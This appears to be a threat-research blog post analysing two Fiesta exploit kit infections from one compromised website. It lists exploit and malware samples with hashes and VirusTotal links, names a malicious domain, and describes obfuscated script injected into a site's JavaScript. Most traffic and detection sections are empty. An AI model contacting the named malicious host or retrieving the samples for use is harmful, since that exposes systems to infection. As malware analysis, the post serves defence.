2014-09-18 - TWO DIFFERENT FIESTA EK INFECTIONS TRIGGERED BY THE SAME COMPROMISED WEBSITE

ASSOCIATED FILES:

NOTES:

 

CHAIN OF EVENTS

ASSOCIATED DOMAINS:

 

PAGE FROM COMPROMISED WEBSITE:

 

REGULAR FIESTA INFECTION PATH:

REGULAR FIESTA:

 

NEW FIESTA INFECTION PATH:

NEW FIESTA:

 

POST-INFECTION TRAFFIC:

CLICK FRAUD TRAFFIC BEGINS:

 

PRELIMINARY MALWARE ANALYSIS

FIRST FLASH FILE (FROM THE "NEW FIESTA" TRAFFIC):

File name:  2014-09-18-Fiesta-EK-first-flash-file.swf
File size:  2.2 KB ( 2273 bytes )
MD5 hash:  17ed0f7fd3e648411e021eab6ef78cf9
Detection ratio:  1 / 55
First submission:  2014-09-18 14:48:43 UTC
VirusTotal link:  https://www.virustotal.com/en/file/72e498e7ed60a4384b2d613bff7ac9454505f4471fcccd4e8006ac71ed9e40d1/analysis/

 

FIRST SILVERLIGHT FILE (FROM THE "NEW FIESTA" TRAFFIC):

File name:  2014-09-18-Fiesta-EK-first-silverlight-file.xap
File size:  3.7 KB ( 3750 bytes )
MD5 hash:  c1d01850216cd0d9b02065f27de7f0a8
Detection ratio:  0 / 53
First submission:  2014-09-18 14:46:41 UTC
VirusTotal link:  https://www.virustotal.com/en/file/f488f82eac46e71c73178253a9a97825a168a44a8255e8d87057d580c2fca745/analysis/

 

FLASH EXPLOIT:

File name:  2014-09-18-Fiesta-EK-flash-exploit.swf
File size:  10.0 KB ( 10209 bytes )
MD5 hash:  36912f3f0398594a8ae1b2962c21e528
Detection ratio:  3 / 55
First submission:  2014-09-18 15:45:11 UTC
VirusTotal link:  https://www.virustotal.com/en/file/1de4e29cb0f3fc115c70a4082919a2e47760d52ab0a10536dbf1b2c995feb3a6/analysis/

 

JAVA EXPLOIT:

File name:  2014-09-18-Fiesta-EK-java-exploit.jar
File size:  5.1 KB ( 5220 bytes )
MD5 hash:  5d4a1572061b2c09b46f99e9ad7a62b2
Detection ratio:  3 / 55
First submission:  2014-09-18 14:47:30 UTC
VirusTotal link:  https://www.virustotal.com/en/file/9f559797bc19451242603cd81ad3a29010ad890a43fadd79839e344bfcc7a54c/analysis/

 

PDF EXPLOIT:

File name:  2014-09-18-Fiesta-EK-pdf-exploit.pdf
File size:  7.3 KB ( 7451 bytes )
MD5 hash:  d1ba9ac63d9c80b725f939a5f99c4727
Detection ratio:  4 / 54
First submission:  2014-09-18 14:47:45 UTC
VirusTotal link:  https://www.virustotal.com/en/file/a56f22010aee681d4aa77795b86955df761ea65637809178d356eaf3aa3a7738/analysis/

 

SILVERLIGHT EXPLOIT:

File name:  2014-09-18-Fiesta-EK-silverlight-exploit.xap
File size:  18.8 KB ( 19284 bytes )
MD5 hash:  8c9e47e6f7802b65428b31c8f28bc899
Detection ratio:  2 / 54
First submission:  2014-09-17 18:42:07 UTC
VirusTotal link:  https://www.virustotal.com/en/file/897e5a20b6b3dd925d1ea5b6fdc657bfa3dff3582050aee0dae7b295c3042d59/analysis/

 

RERDOM MALWARE FROM THE COMPROMISED VM:

File name:  UpdateFlashPlayer_92ad4ca3.exe
File size:  164.0 KB ( 167936 bytes )
MD5 hash:  5ac521e0e93c3bee7b99ada635e6a0de
Detection ratio:  8 / 54
First submission:  2014-09-18 14:48:15 UTC
VirusTotal link:  https://www.virustotal.com/en/file/14c735ebfc4a42f2172e1195111f2ccedf47cd2a2368322e3455b600179da886/analysis/

 

SNORT EVENTS

Emerging Threats and ETPRO rulesets from Sguil on Security Onion (not including ET INFO or ET POLICY rules):

Sourcefire VRT ruleset from Snort 2.9.6.2 on Debian 7 (not including preprocessor events):

 

PATH TO THE REGULAR FIESTA EK

In file demo.js from the compromised website, there is some hexadecimal obfuscated script at the end of the file.  That hexadecimal code translates to the next URL in the infection chain:

 

This HTTP GET request returns an iframe pointing to the landing page for regular Fiesta:

 

The first HTTP GET request for ad traffic from the comrpomised site.  This includes some script injected at the beginning.  The script points to the next URL in the infection chain:

 

HTML returned from this HTTP GET request starts the "new Fiesta" traffic from hxrgy.ianlar.in:

 

FINAL NOTES

Once again, here are the associated files:

ZIP files are password-protected with the standard password.  If you don't know it, look at the "about" page of this website.

Click here to return to the main page.